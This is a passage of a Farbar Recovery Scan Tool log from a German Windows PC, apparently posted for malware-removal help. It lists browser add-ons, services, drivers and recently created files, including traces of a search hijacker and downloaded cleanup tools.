BHO-x32: Windows Live Anmelde-Hilfsprogramm - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO-x32: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll (Adobe Systems Incorporated)
BHO-x32: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Toolbar: HKLM - Easy Photo Print - {9421DD08-935F-4701-A9CA-22DF90AC4EA6} - C:\Program Files (x86)\Epson Software\Easy Photo Print\EPTBL.dll (SEIKO EPSON CORPORATION / CyCom Technology Corp.)
Toolbar: HKLM - Home Server Banner - {D73E76A3-F902-45BD-8FC8-95AE8E014671} - C:\Program Files\Windows Home Server\WHSDeskBands.dll (Microsoft Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Adobe\Adobe Acrobat 7.0\Acrobat\AcroIEFavClient.dll (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKCU - Google Toolbar - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKCU - No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Toolbar: HKCU - Home Server Banner - {D73E76A3-F902-45BD-8FC8-95AE8E014671} - C:\Program Files\Windows Home Server\WHSDeskBands.dll (Microsoft Corporation)
Handler-x32: http\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: http\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: https\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll (Microsoft Corporation)
Handler-x32: msdaipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msdaipp\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Program Files (x86)\Common Files\System\OLE DB\msdaipp.dll (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8089.0726.dll (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{A8B01E69-7297-4C38-B3E3-40775DDD3E9E}: [NameServer]213.94.78.17 213.94.78.16

FireFox:
========
FF ProfilePath: C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default
FF Homepage: hxxp://www.starobserver.org|hxxp://news.astronomie.info/
FF Keyword.URL: hxxp://search.skipity.com/?source=ab&q=
FF Plugin: @adobe.com/FlashPlayer - C:\Windows\system32\Macromed\Flash\NPSWF64_11_9_900_170.dll ()
FF Plugin: @divx.com/DivX VOD Helper,version=1.0.0 - C:\Program Files\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin: @microsoft.com/GENUINE - disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 - C:\Program Files\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_9_900_170.dll ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin-x32: @divx.com/DivX VOD Helper,version=1.0.0 - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
FF Plugin-x32: @Google.com/GoogleEarthPlugin - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin-x32: @java.com/DTPlugin,version=10.45.2 - C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.45.2 - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin-x32: @microsoft.com/GENUINE - disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 - C:\Program Files (x86)\Microsoft Silverlight\5.1.20913.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeLive,version=1.5 - C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8081.0709 - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
FF Plugin-x32: @t-immersion.com/DFusionHomeWebPlugIn - C:\Program Files (x86)\Total Immersion\DFusionHomeWebPlugIn\NPDFusionWebFirefox.dll (Total Immersion)
FF Plugin-x32: @tools.google.com/Google Update;version=3 - C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 - C:\Program Files (x86)\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.1 - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
FF Plugin-x32: Adobe Reader - C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect - C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll (Adobe Systems)
FF Plugin HKCU: amazon.com/AmazonMP3DownloaderPlugin - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101721.dll (Amazon.com, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll (Adobe Systems Inc.)
FF SearchPlugin: C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\searchplugins\s-amazon.xml
FF SearchPlugin: C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\searchplugins\skipity-search.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\searchplugins\googledesktop.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\amazondotcom-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\eBay-de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\leo_ende_de.xml
FF SearchPlugin: C:\Program Files (x86)\mozilla firefox\browser\searchplugins\yahoo-de.xml
FF Extension: German Dictionary - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\de-DE@dictionaries.addons.mozilla.org [2012-10-14]
FF Extension: Print pages to PDF - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\printPages2Pdf@reinhold.ripper [2013-11-12]
FF Extension: WOT - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\{a0d7ccb3-214d-498b-b4aa-0e8fda9a7bf7} [2013-11-28]
FF Extension: Firebug - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\firebug@software.joehewitt.com.xpi [2013-09-23]
FF Extension: Write Area - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\writearea@writearea.com.xpi [2012-10-22]
FF Extension: Web Developer - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\{c45c406e-ab73-11d8-be73-000a95be3b12}.xpi [2012-08-15]
FF Extension: Adblock Plus - C:\Users\*****\AppData\Roaming\Mozilla\Firefox\Profiles\v60bhm7j.default\Extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi [2013-10-19]
FF Extension: Anti-Banner - C:\Program Files (x86)\Mozilla Firefox\extensions\KavAntiBanner@kaspersky.ru_bak [2013-12-12]
FF Extension: Modul zur Link-Untersuchung - C:\Program Files (x86)\Mozilla Firefox\extensions\linkfilter@kaspersky.ru_bak [2013-12-12]
FF Extension: Java Console - C:\Program Files (x86)\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0033-ABCDEFFEDCBA} [2013-12-12]
FF HKLM-x32\...\Firefox\Extensions: [virtualKeyboard@kaspersky.ru] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\FFExt\virtualKeyboard@kaspersky.ru
FF HKLM-x32\...\Firefox\Extensions: [KavAntiBanner@Kaspersky.ru] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\FFExt\KavAntiBanner@kaspersky.ru
FF HKLM-x32\...\Firefox\Extensions: [linkfilter@kaspersky.ru] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 2011\FFExt\linkfilter@kaspersky.ru

Chrome: 
=======
CHR Plugin: (Shockwave Flash) - C:\Program Files (x86)\Google\Chrome\Application\26.0.1410.64\PepperFlash\pepflashplayer.dll No File
CHR Plugin: (Chrome Remote Desktop Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files (x86)\Google\Chrome\Application\26.0.1410.64\ppGoogleNaClPluginChrome.dll No File
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files (x86)\Google\Chrome\Application\26.0.1410.64\pdf.dll No File
CHR Plugin: (Adobe Acrobat) - C:\Program Files (x86)\Adobe\Reader 11.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (2007 Microsoft Office system) - C:\Program Files (x86)\Mozilla Firefox\plugins\NPOFF12.DLL (Microsoft Corporation)
CHR Plugin: (AmazonMP3DownloaderPlugin) - C:\Program Files (x86)\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101721.dll (Amazon.com, Inc.)
CHR Plugin: (DivX VOD Helper Plug-in) - C:\Program Files (x86)\DivX\DivX OVS Helper\npovshelper.dll (DivX, LLC.)
CHR Plugin: (Google Earth Plugin) - C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll (Google)
CHR Plugin: (Picasa) - C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll (Google, Inc.)
CHR Plugin: (Google Update) - C:\Program Files (x86)\Google\Update\1.3.21.135\npGoogleUpdate3.dll No File
CHR Plugin: (Java(TM) Platform SE 7 U17) - C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
CHR Plugin: (Silverlight Plug-In) - C:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll No File
CHR Plugin: (Microsoft Office Live Plug-in for Firefox) - C:\Program Files (x86)\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
CHR Plugin: (NVIDIA 3D Vision) - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)
CHR Plugin: (NVIDIA 3D VISION) - C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)
CHR Plugin: (D'Fusion @Home Web Plug-In (3.20.20164)) - C:\Program Files (x86)\Total Immersion\DFusionHomeWebPlugIn\NPDFusionWebFirefox.dll (Total Immersion)
CHR Plugin: (VLC Web Plugin) - C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll (VideoLAN)
CHR Plugin: (Windows Live\u00AE Photo Gallery) - C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
CHR Plugin: (iTunes Application Detector) - C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()
CHR Plugin: (Shockwave Flash) - C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_169.dll No File
CHR Plugin: (Java Deployment Toolkit 7.0.170.2) - C:\Windows\SysWOW64\npDeployJava1.dll No File
CHR Extension: (Google Docs) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.5_0 [2013-10-11]
CHR Extension: (Google Drive) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0 [2013-10-11]
CHR Extension: (YouTube) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0 [2013-10-11]
CHR Extension: (Google Search) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0 [2013-10-11]
CHR Extension: (Chrome In-App Payments service) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.4.11_0 [2013-10-11]
CHR Extension: (Gmail) - C:\Users\*****\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0 [2013-04-19]

==================== Services (Whitelisted) =================

S3 Adobe LM Service; C:\Program Files (x86)\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [72704 2010-12-18] (Adobe Systems)
R2 Adobe Version Cue CS2; C:\Program Files (x86)\Adobe\Adobe Version Cue CS2\bin\VersionCueCS2.exe [163840 2005-04-06] (Adobe Systems Incorporated)
R2 arXfrSvc; C:\Program Files\Windows Home Server\Microsoft.HomeServer.Archive.TransferService.exe [231280 2011-01-10] (Microsoft Corporation)
R2 avmike; C:\Program Files\FRITZ!Fernzugang\avmike.exe [335224 2010-03-30] (AVM Berlin)
R2 certsrv; C:\Program Files\FRITZ!Fernzugang\certsrv.exe [143224 2010-03-30] (AVM Berlin)
R2 dgdersvc; C:\Windows\SysWOW64\dgdersvc.exe [95568 2010-05-13] (Devguru Co., Ltd.)
R2 esClient; C:\Program Files\Windows Home Server\esClient.exe [109936 2011-01-10] (Microsoft Corporation)
R2 FirebirdGuardianHS3SRInstance; C:\HS3 Hotelsoftware\DB-Server\bin\fbguard_hs3sr.exe [1265664 2011-01-17] ()
R3 FirebirdServerHS3SRInstance; C:\HS3 Hotelsoftware\DB-Server\bin\fbserver_hs3sr.exe [3735552 2011-01-17] (Firebird Project)
S3 FirebirdServerMAGIXInstance; C:\Program Files (x86)\MAGIX\Common\Database\bin\fbserver.exe [1527900 2005-11-17] (MAGIX®)
S3 GoogleDesktopManager-051210-111108; C:\Program Files (x86)\Google\Google Desktop Search\GoogleDesktop.exe [30192 2010-12-20] (Google)
R2 HauppaugeTVServer; C:\Program Files (x86)\WinTV\TVServer\HauppaugeTVServer.exe [577024 2012-03-24] (Hauppauge Computer Works)
R2 HWDeviceService64.exe; C:\ProgramData\DatacardService\HWDeviceService64.exe [346976 2011-03-14] ()
S3 KiesAllShare; C:\Program Files (x86)\Samsung\Kies\WiselinkPro\WiselinkPro.exe [9241088 2010-05-13] ()
S3 Macromedia Licensing Service; C:\Program Files (x86)\Common Files\Macromedia Shared\Service\Macromedia Licensing.exe [68096 2010-12-19] ()
R2 MBAMScheduler; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamscheduler.exe [418376 2013-04-04] (Malwarebytes Corporation)
R2 MBAMService; C:\Program Files (x86)\Malwarebytes' Anti-Malware\mbamservice.exe [701512 2013-04-04] (Malwarebytes Corporation)
R2 MsMpSvc; C:\Program Files\Microsoft Security Client\MsMpEng.exe [23808 2013-10-23] (Microsoft Corporation)
R2 MWLService; C:\Program Files (x86)\EgisTec\MyWinLocker 3\x86\\MWLService.exe [305448 2009-09-10] (Egis Technology Inc.)
S3 NisSrv; C:\Program Files\Microsoft Security Client\NisSrv.exe [348376 2013-10-23] (Microsoft Corporation)
R2 nwtsrv; C:\Program Files\FRITZ!Fernzugang\nwtsrv.exe [189304 2010-03-30] (AVM Berlin)
R2 TryAndDecideService; C:\Program Files (x86)\Common Files\Acronis\Fomatik\TrueImageTryStartService.exe [498872 2007-08-31] ()
R2 USBS3S4Detection; C:\OEM\USBDECTION\USBS3S4Detection.exe [76320 2009-12-09] ()
R2 WHSConnector; C:\Program Files\Windows Home Server\WHSConnector.exe [489840 2011-01-10] (Microsoft Corporation)

==================== Drivers (Whitelisted) ====================

R3 dgderdrv; C:\Windows\System32\drivers\dgderdrv.sys [20568 2010-05-13] (Devguru Co., Ltd)
R3 dgderdrv; C:\Windows\SysWOW64\drivers\dgderdrv.sys [18136 2010-05-13] (Devguru Co., Ltd)
S3 hcw17bda; C:\Windows\System32\drivers\hcw17bda.sys [67456 2010-01-27] (Hauppauge Computer Works, Inc.)
S3 huawei_wwanecm; C:\Windows\System32\DRIVERS\ew_juwwanecm.sys [242688 2012-12-22] (Huawei Technologies Co., Ltd.)
S4 Iaaidassi; No ImagePath
R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25928 2013-04-04] (Malwarebytes Corporation)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [248240 2013-09-27] (Microsoft Corporation)
S3 NisDrv; C:\Windows\System32\DRIVERS\NisDrvWFP.sys [134944 2013-09-27] (Microsoft Corporation)
R3 NWIM; C:\Windows\System32\DRIVERS\avmnwim.sys [412024 2010-03-30] (AVM Berlin)
R2 TurboB; C:\Windows\System32\DRIVERS\TurboB.sys [13784 2009-08-06] ()
R1 UimBus; C:\Windows\System32\DRIVERS\uimx64.sys [59184 2011-11-17] (Windows (R) 2000 DDK provider)
R1 Uim_IM; C:\Windows\System32\Drivers\Uim_IMx64.sys [572336 2011-11-17] (Paragon)
R1 Uim_VIM; C:\Windows\System32\Drivers\uim_vimx64.sys [352816 2011-11-17] (Paragon)
U5 ew_hwusbdev; C:\Windows\System32\Drivers\ew_hwusbdev.sys [117248 2010-07-27] (Huawei Technologies Co., Ltd.)
U5 UnlockerDriver5; C:\Program Files\Unlocker\UnlockerDriver5.sys [12352 2010-07-01] ()

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2014-01-15 11:45 - 2014-01-15 11:45 - 00001206 _____ C:\Users\*****\Desktop\JRT.txt
2014-01-15 11:39 - 2014-01-15 11:39 - 00000000 ____D C:\Windows\ERUNT
2014-01-15 10:47 - 2014-01-15 11:04 - 00000000 ____D C:\AdwCleaner
2014-01-15 10:38 - 2014-01-15 10:38 - 00001688 _____ C:\Users\*****\Desktop\xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx tro.txt
2014-01-15 10:35 - 2014-01-15 10:35 - 01236282 _____ C:\Users\*****\Downloads\adwcleaner.exe
2014-01-15 10:35 - 2014-01-15 10:35 - 01037068 _____ (Thisisu) C:\Users\*****\Downloads\JRT.exe
2014-01-15 10:34 - 2014-01-15 10:34 - 00448512 _____ (OldTimer Tools) C:\Users\*****\Downloads\TFC.exe
2014-01-15 09:05 - 2014-01-15 09:05 - 00001113 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2014-01-15 09:05 - 2014-01-15 09:05 - 00000000 ____D C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-01-15 09:05 - 2013-04-04 14:50 - 00025928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-01-15 09:04 - 2014-01-15 09:05 - 10285040 _____ (Malwarebytes Corporation                                    ) C:\Users\*****\Downloads\mbam-setup-1.75.0.1300.exe
2014-01-15 08:45 - 2014-01-15 08:46 - 00377856 _____ C:\Users\*****\Downloads\gmer_2.1.19163.exe
2014-01-15 08:44 - 2014-01-15 08:44 - 00000000 ____D C:\FRST
2014-01-15 08:43 - 2014-01-15 08:44 - 02076160 _____ (Farbar) C:\Users\*****\Downloads\FRST64.exe
2014-01-15 08:42 - 2014-01-15 08:42 - 00000000 _____ C:\Users\*****\defogger_reenable
2014-01-15 08:41 - 2014-01-15 08:41 - 00050477 _____ C:\Users\*****\Downloads\Defogger.exe
2014-01-14 18:44 - 2014-01-14 18:44 - 00002952 _____ C:\Users\*****\Downloads\access_log_2013-11-12.gz
2014-01-14 18:42 - 2014-01-14 18:42 - 00002316 _____ C:\Users\*****\Downloads\access_log_2014-01-05.gz
2014-01-14 18:40 - 2014-01-14 18:50 - 121822819 _____ C:\Users\*****\Downloads\avg_arl_ffi_all_120_130801a6481.rar
2014-01-14 18:28 - 2014-01-14 18:35 - 112001024 _____ C:\Users\*****\Downloads\avg_arl_cdi_all_120_130801a6481.iso
2014-01-14 18:26 - 2014-01-14 18:54 - 625348608 _____ C:\Users\*****\Downloads\rescue-system.iso
2014-01-14 18:15 - 2014-01-14 18:38 - 00043520 ___SH C:\Users\*****\AppData\Roaming\Thumbs.db
2014-01-14 18:09 - 2014-01-14 18:09 - 05063616 _____ (PortableApps.com) C:\Users\*****\Downloads\FileZillaPortable_3.7.3.paf.exe
2014-01-14 15:11 - 2014-01-14 15:11 - 00378099 _____ C:\Users\*****\Downloads\10_246_16_68.sql
2014-01-14 11:03 - 2014-01-14 11:04 - 00000000 ____D C:\Users\*****\Desktop\templates_c
2014-01-13 16:31 - 2014-01-13 16:31 - 01790152 _____ C:\Users\*****\Downloads\com_phocagallery_v3.2.6(1).zip
2014-01-13 14:04 - 2014-01-13 14:04 - 00000282 _____ C:\Users\*****\Desktop\10 Schritte zum erfolgreichen Facebook-Gewinnspiel Fanpage Karma Blog.URL
2014-01-12 16:53 - 2014-01-12 16:53 - 00000217 _____ C:\Users\*****\Desktop\The Scale of the Universe 2 — Other Languages.URL
2014-01-12 10:56 - 2014-01-12 10:56 - 00028736 _____ C:\Users\*****\Downloads\12_01_2014_WebFTP.zip
2014-01-12 09:20 - 2014-01-12 09:20 - 00119546 _____ C:\Users\*****\Downloads\droid-serif.zip
2014-01-12 09:20 - 2014-01-12 09:20 - 00079700 _____ C:\Users\*****\Downloads\droid-sans-mono.zip
2014-01-12 09:20 - 2014-01-12 09:20 - 00011194 _____ C:\Users\*****\Downloads\Droid.zip
2014-01-12 09:19 - 2014-01-12 09:19 - 00211015 _____ C:\Users\*****\Downloads\Droid-Sans.zip
2014-01-11 20:32 - 2014-01-11 20:33 - 00002057 _____ C:\Users\*****\Desktop\configuration.php
2014-01-10 10:58 - 2014-01-10 10:58 - 00036115 _____ C:\Users\*****\Downloads\access-2014010821-2014011002.log.gz
2014-01-08 11:52 - 2014-01-08 11:52 - 00002371 _____ C:\Users\*****\Downloads\address.zip
2014-01-08 11:15 - 2014-01-08 11:15 - 00000000 ____D C:\Program Files (x86)\FlippingBook
2014-01-08 11:15 - 2004-03-09 00:00 - 00662288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSCOMCT2.OCX
2014-01-08 11:15 - 1998-07-06 00:00 - 00023552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMPIDE.DLL
2014-01-08 11:15 - 1998-06-24 00:00 - 00137000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MSMAPI32.OCX
2014-01-08 11:13 - 2014-01-08 11:15 - 00000000 __HDC C:\ProgramData\{0C886C27-6204-4A3D-8348-A42A59BC7205}
2014-01-08 11:13 - 2014-01-08 11:13 - 00000000 ____D C:\Users\*****\AppData\Local\III
2014-01-07 19:50 - 2014-01-07 19:50 - 00000233 _____ C:\Users\*****\Desktop\Fly Birds Hd Legendary Birds Legendary Pokemon. Colourful Pheasant Birds Wallpapers. Fly Birds Hd ~ Photoinpixel.URL
2014-01-04 19:06 - 2014-01-04 19:06 - 00003714 _____ C:\Users\*****\Desktop\pointclouds - Verknüpfung.lnk
2014-01-02 11:26 - 2014-01-02 11:26 - 00000053 _____ C:\Users\*****\Desktop\google63a169ac443c121d.html
2013-12-31 14:08 - 2013-12-31 14:08 - 00000225 _____ C:\Users\*****\Desktop\macklemore album.URL
2013-12-30 20:11 - 2013-12-30 20:16 - 176752984 _____ (VMware, Inc.                                                   ) C:\Users\*****\Downloads\VMware-converter-en-5.5.0-1362012.exe
2013-12-30 08:54 - 2013-12-30 08:58 - 98508144 _____ (VMware, Inc.) C:\Users\*****\Downloads\VMware-player-6.0.1-1379776.exe
2013-12-30 08:35 - 2013-12-30 08:35 - 00409141 _____ C:\Users\*****\Downloads\torbutton146-current.zip
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Roaming\Stellarium
2013-12-29 12:29 - 2013-12-29 12:29 - 00000000 ____D C:\Users\*****\AppData\Local\stellarium
2013-12-29 12:28 - 2013-12-29 12:28 - 00001724 _____ C:\Users\Public\Desktop\Stellarium.lnk
2013-12-29 12:28 - 2013-12-29 12:28 - 00000000 ____D C:\Program Files\Stellarium
2013-12-29 11:22 - 2013-12-29 11:24 - 81699167 _____ (Stellarium team                                             ) C:\Users\*****\Downloads\stellarium-0.12.4-win64.exe
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_juextctrl_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jucdcacm_01007.Wdf
2013-12-28 11:57 - 2013-12-28 11:57 - 00000000 ____D C:\Users\*****\AppData\Roaming\Sierra Wireless
2013-12-28 11:56 - 2013-12-28 11:57 - 00000000 ____D C:\ProgramData\mquadr.at
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____H C:\Windows\system32\Drivers\Msft_Kernel_ew_jubusenum_01007.Wdf
2013-12-28 11:56 - 2013-12-28 11:56 - 00000000 ____D C:\Users\*****\AppData\Local\mquadr.at
2013-12-28 11:55 - 2013-12-28 11:55 - 00001163 _____ C:\Users\Public\Desktop\3InternetManager.lnk
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 __HDC C:\ProgramData\{A48B2592-413B-41AB-8710-5543CB7481EC}
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\ProgramData\H3G
2013-12-28 11:55 - 2013-12-28 11:55 - 00000000 ____D C:\Program Files (x86)\3InternetManager
2013-12-28 11:55 - 2013-06-06 13:00 - 03748792 ____N (mquadr.at software engineering und consulting GmbH) C:\Windows\SysWOW64\M2ElevatedCalls.dll
2013-12-28 11:55 - 2012-12-22 09:46 - 00014976 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_usbenumfilter.sys
2013-12-28 11:55 - 2012-12-22 09:41 - 00242688 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_juwwanecm.sys
2013-12-28 11:55 - 2012-12-22 09:41 - 00076800 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jucdcecm.sys
2013-12-28 11:55 - 2012-12-03 18:40 - 00452608 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ewusbwwan.sys
2013-12-28 11:55 - 2012-12-03 14:57 - 00238592 ____N (Nicomsoft Ltd.) C:\Windows\SysWOW64\WiFiMan.dll
2013-12-28 11:55 - 2012-08-20 08:55 - 00104960 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jucdcacm.sys
2013-12-28 11:55 - 2012-08-20 08:55 - 00090112 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_jubusenum.sys
2013-12-28 11:55 - 2012-08-20 08:55 - 00030720 _____ (Huawei Technologies Co., Ltd.) C:\Windows\system32\Drivers\ew_juextctrl.sys
2013-12-28 11:55 - 2012-08-20 08:37 - 01490656 _____ (Microsoft Corporation) C:\Windows\system32\WdfCoInstaller01007.dll
